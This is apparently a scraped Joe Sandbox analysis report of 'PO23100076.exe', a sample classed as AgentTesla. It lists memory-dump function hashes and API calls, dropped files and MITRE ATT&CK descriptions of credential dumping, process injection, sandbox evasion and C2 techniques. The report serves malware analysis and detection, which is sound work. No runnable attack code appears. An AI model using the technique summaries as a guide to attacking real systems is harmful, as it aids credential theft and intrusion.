Opcode ID: bdd35fdf88a0c59eff7301d82f34a1a46a042970c353911ee8b4e88a4be939b0
Instruction ID: b36cd2e37de922e04304d3775320d7068848dfc5d3484b3d08ed17224da355d4
Opcode Fuzzy Hash: bdd35fdf88a0c59eff7301d82f34a1a46a042970c353911ee8b4e88a4be939b0
Instruction Fuzzy Hash: 55E11B75E002198FEB14DFA8C580AAEFBB2FF89304F248159D455AB395D731AD42DF60

Function 06F05738 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1278385384.0000000006F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f00000_PO23100076.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b4cfff6d4565f6e97b5e70c7c160ce1dc6891f5c3d402b12e28b2380177dff89
Instruction ID: ad1b235f58e866939a22904c452686878883ddc5bf4ef2337f21e5d448f7642e
Opcode Fuzzy Hash: b4cfff6d4565f6e97b5e70c7c160ce1dc6891f5c3d402b12e28b2380177dff89
Instruction Fuzzy Hash: 05E10A74E002198FEB14DFA9C580AAEFBF2BF89304F248159D455AB395D770AD42DF60

Function 06F02D18 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1278385384.0000000006F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f00000_PO23100076.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 31d2b53cd330315d33b5550416d0c3e7d995ad00d8e550be7bfdea2c1c5c4307
Instruction ID: ec2f7060f07f3583bdf087066673ac5275807c5f348d77186373ff670f6a9be3
Opcode Fuzzy Hash: 31d2b53cd330315d33b5550416d0c3e7d995ad00d8e550be7bfdea2c1c5c4307
Instruction Fuzzy Hash: 6FE1FC74E002198FEB14DFA9C590AAEFBB2FF89304F248169D455AB395D7309D42DF60

Function 06F05300 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1278385384.0000000006F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f00000_PO23100076.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 99a6326a7ddff0f5b716e38b7b4440d24611bbc438cdbaf5b4b1f7bf6caea354
Instruction ID: c7718226ce24411b1cb8709bdcf86ed1a6c54aad6ab35971cee2eac003d3c749
Opcode Fuzzy Hash: 99a6326a7ddff0f5b716e38b7b4440d24611bbc438cdbaf5b4b1f7bf6caea354
Instruction Fuzzy Hash: 7EE11974E002198FEB14DFA8C590AAEFBF2BF89304F248169D455AB395D770AD42DF60

Function 06F04950 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1278385384.0000000006F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f00000_PO23100076.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5baa93b06a7150ddcf41ac0b48f6ef6130712dea9bea6ed8ae0be162b89739c7
Instruction ID: 0059d9e9486b0ae09a246e214339abb5129c3f4809ed87682ace4d7bb977832f
Opcode Fuzzy Hash: 5baa93b06a7150ddcf41ac0b48f6ef6130712dea9bea6ed8ae0be162b89739c7
Instruction Fuzzy Hash: FCE1F674E00219CFEB14DFA9C580AAEBBF2BF89304F248169D555AB395D730AD42DF60

Function 04AE0414 Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1275851820.0000000004AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4ae0000_PO23100076.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8f1a1884fb3cb6b651562c95e536b854e31f1679e52367a112c59f399499c199
Instruction ID: a560b90df47e847a0042886aa0f3178d6610767b1bcf2195b9eab454a171f217
Opcode Fuzzy Hash: 8f1a1884fb3cb6b651562c95e536b854e31f1679e52367a112c59f399499c199
Instruction Fuzzy Hash: F8A17F32E00215CFCF15DFB6C9809EEB7B2FF84304B15856AE815AB215EB71E956CB90

Function 04AE2548 Relevance: .2, Instructions: 222COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1275851820.0000000004AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4ae0000_PO23100076.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 639a544323fa12a0a4e04aa5d95b91c3a76e256630b24fe61c71f6d87d5d466a
Instruction ID: d8e40681b442d2a0de9471df62fd78f0f16f5405c952c7fc555cdcf8294d8f33
Opcode Fuzzy Hash: 639a544323fa12a0a4e04aa5d95b91c3a76e256630b24fe61c71f6d87d5d466a
Instruction Fuzzy Hash: E2C149B1C917459BD310CF65E85AA893BB1BB81324FD04B09D2612F2D5FBB4126EEF48

Function 0682AC78 Relevance: .2, Instructions: 188COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1277105916.0000000006820000.00000040.00000800.00020000.00000000.sdmp, Offset: 06820000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6820000_PO23100076.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 591f7df4aa886faecf12d12ddf4555567d9d3e7b8eb160bedbc5263176cbe63b
Instruction ID: c6ca6b844bd4798173a7e09b5be16660477d66723000eec334ed5ede2487bfaf
Opcode Fuzzy Hash: 591f7df4aa886faecf12d12ddf4555567d9d3e7b8eb160bedbc5263176cbe63b
Instruction Fuzzy Hash: 9D610575D0522ECFDB68CFA9C840AEEBBB6FF89305F109029D919A7215D7305986CF80

Function 06F02CFD Relevance: .1, Instructions: 134COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1278385384.0000000006F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f00000_PO23100076.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 529fcf70204a21b95c9819de302f92d96274fb7f0b1d79891cc004cd8f6c4094
Instruction ID: 68f8ef75c9f94648a86251027a9c9e23b98e25d108994cbccea560a4644edae9
Opcode Fuzzy Hash: 529fcf70204a21b95c9819de302f92d96274fb7f0b1d79891cc004cd8f6c4094
Instruction Fuzzy Hash: 07516F74E042598FDB14CF69C5805AEFBF2BF89304F24816AD459AB356D7309E42CF61

Function 06F03150 Relevance: .1, Instructions: 127COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1278385384.0000000006F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f00000_PO23100076.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dc37b9fd04ba06ddd2bedb321dbf9eafdebe044bfc9be9c5cf33e2b4ea0d7b64
Instruction ID: d2d8b687a9c4d563b390ed8713a67ee9c415b7d3846127af735a00bf1d70a931
Opcode Fuzzy Hash: dc37b9fd04ba06ddd2bedb321dbf9eafdebe044bfc9be9c5cf33e2b4ea0d7b64
Instruction Fuzzy Hash: FD510875E002198FEB14DFA9C5809AEFBF2BF89304F248169D419AB355D7319E42DFA0

Analysis Process: PO23100076.exePID: 6936, Parent PID: 5392COMMON

Execution Graph

Execution Coverage:	7.4%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	32
Total number of Limit Nodes:	6

Executed Functions

Function 06470040 Relevance: 4.6, APIs: 1, Instructions: 3123windowCOMMON

Download Yara Rule

APIs

WaitMessage.USER32 ref: 064733C8

Memory Dump Source

Source File: 00000008.00000002.2493353638.0000000006470000.00000040.00000800.00020000.00000000.sdmp, Offset: 06470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6470000_PO23100076.jbxd

Similarity

API ID: MessageWait
String ID:
API String ID: 1058943002-0
Opcode ID: f48c6a0e5c9beb83cd5b09f5884f233e8694f7a763a41328c11b0609979639cd
Instruction ID: b4af45bf7cfea3389b55da6a57f2753b0cb9cf63db63186df726214bc53ff88a
Opcode Fuzzy Hash: f48c6a0e5c9beb83cd5b09f5884f233e8694f7a763a41328c11b0609979639cd
Instruction Fuzzy Hash: 76630931D10B198ADB51EF68C8846D9F7B1FF99300F15C79AE4587B221EB70AAC5CB81

Function 062C41A0 Relevance: 1.6, APIs: 1, Instructions: 140
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000008.00000002.2493226703.00000000062C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 062C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_62c0000_PO23100076.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c5e8ce7df5dd6216919a5f2de1b5a22ba49f53fdc17d3fdd2c9202ac10427287
Instruction ID: 24ff014815f743e6941c6aba2a858b820a2bf814aea195494e731f1a300c4ff1
Opcode Fuzzy Hash: c5e8ce7df5dd6216919a5f2de1b5a22ba49f53fdc17d3fdd2c9202ac10427287
Instruction Fuzzy Hash: A8412331D143968FCB10DFB9D81469EBFF1AF89220F15866ED884E7281DB749845CBE1

Function 04EAAE98 Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 04EAAF1F

Memory Dump Source

Source File: 00000008.00000002.2491965612.0000000004EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4ea0000_PO23100076.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 067d672daca722668e77ea0bb7dd590d88e8c05eb90a5ff2bbecb87780ec767a
Instruction ID: bf002e556bd09ecc05f166482f37138ae854c997427758b3ee9bf380d7338b97
Opcode Fuzzy Hash: 067d672daca722668e77ea0bb7dd590d88e8c05eb90a5ff2bbecb87780ec767a
Instruction Fuzzy Hash: 6521E4B5D003099FDB10CF9AD884ADEBBF5EB48310F14841AE914A7350D374A954CFA5

Function 04EAAE90 Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 04EAAF1F

Memory Dump Source

Source File: 00000008.00000002.2491965612.0000000004EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4ea0000_PO23100076.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 926473e0864b25263d164e448100d31a29ed07a948a2e5b0f7f91bbd37d89096
Instruction ID: 94ef4cc90db003aac23b1a6ad764ad8110a47b887cf51e6c48803f92e29763de
Opcode Fuzzy Hash: 926473e0864b25263d164e448100d31a29ed07a948a2e5b0f7f91bbd37d89096
Instruction Fuzzy Hash: E821E2B5D003099FDB10CFA9D985ADEBBF5EB48320F14842AE918A7350D378A954CFA5

Function 062C4288 Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

GlobalMemoryStatusEx.KERNELBASE ref: 062C42EF

Memory Dump Source

Source File: 00000008.00000002.2493226703.00000000062C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 062C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_62c0000_PO23100076.jbxd

Similarity

API ID: GlobalMemoryStatus
String ID:
API String ID: 1890195054-0
Opcode ID: 58c0262b242efc379bef8eda1a90389f0262d09f5ac137304b7c141a63f7cd4b
Instruction ID: d3f9547adce604fb59f6ce18c25edba0501c0c50ccc4248ea4eec2601b7822c1
Opcode Fuzzy Hash: 58c0262b242efc379bef8eda1a90389f0262d09f5ac137304b7c141a63f7cd4b
Instruction Fuzzy Hash: 3F1123B1C1025A9FDB10DF9AC445BDEFBF4AF48320F11822AD818B7240D778A945CFA1

Function 0102D01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2488922315.000000000102D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0102D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_102d000_PO23100076.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f5d5dde649ee7126987cb99b6ca9f5a21ce51022c12a7136047834e3363bbd4d
Instruction ID: d61a08955c83f6ec79805147ca24dc75fc1949e578b0b4d559e9b3ec40bf4f8e
Opcode Fuzzy Hash: f5d5dde649ee7126987cb99b6ca9f5a21ce51022c12a7136047834e3363bbd4d
Instruction Fuzzy Hash: 40212271604340DFDB25DF94D9C4B16BBA5EB84314F20C5ADE98A0B2A6C33AD807CB62

Function 0102D006 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2488922315.000000000102D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0102D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_102d000_PO23100076.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 804b22e4d85b4a0dda2e53774972d7289051e8eb7b6ec9956cb62cdc207dd24e
Instruction ID: e00c68651db05a68eb5e86a2563999b22ddf2d56e168ee3634dd8dbe4236e48f
Opcode Fuzzy Hash: 804b22e4d85b4a0dda2e53774972d7289051e8eb7b6ec9956cb62cdc207dd24e
Instruction Fuzzy Hash: 072180755083809FCB12CF64D9D4711BFB1EB46214F28C5DAD8898F2A7C33A9816CB62

Function 0101D628 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2488858636.000000000101D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0101D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_101d000_PO23100076.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 05b4b8e96950b7fbb52ec5485073c597cfb3a0add6e1e4f3f2a9ce3fdd7aa0ad
Instruction ID: d2d834b5e3fe826114184c4d24f640d07bf504362d23d2f3d683ea0a194feb49
Opcode Fuzzy Hash: 05b4b8e96950b7fbb52ec5485073c597cfb3a0add6e1e4f3f2a9ce3fdd7aa0ad
Instruction Fuzzy Hash: 0BF062715043449EEB648B1ADC88B62FFD8EB45735F18C99AED4C4B287C2799844CBB1

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report PO23100076.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Agenttesla

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\PO23100076.exe.log

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bjlooxe0.ea0.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jsa23n4z.42n.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rjhcosnx.v5q.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zqwcyacm.xrf.ps1

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Network Behavior

Suricata IDS Alerts

Windows Analysis Report
PO23100076.exe

Function 06828740 Relevance: 8.5, Strings: 6, Instructions: 1029
COMMON

Function 068203B8 Relevance: 6.9, Strings: 5, Instructions: 605
COMMON

Function 06828730 Relevance: 4.0, Strings: 3, Instructions: 242
COMMON

Function 06F05EB8 Relevance: 1.7, APIs: 1, Instructions: 243
processCOMMON

Function 06F05EAF Relevance: 1.7, APIs: 1, Instructions: 243
processCOMMON

Function 04AE3928 Relevance: 1.6, APIs: 1, Instructions: 116
COMMON

Function 04AE420D Relevance: 1.6, APIs: 1, Instructions: 114
COMMON

Function 04AE3A7C Relevance: 1.6, APIs: 1, Instructions: 97
COMMON

Function 02585D10 Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre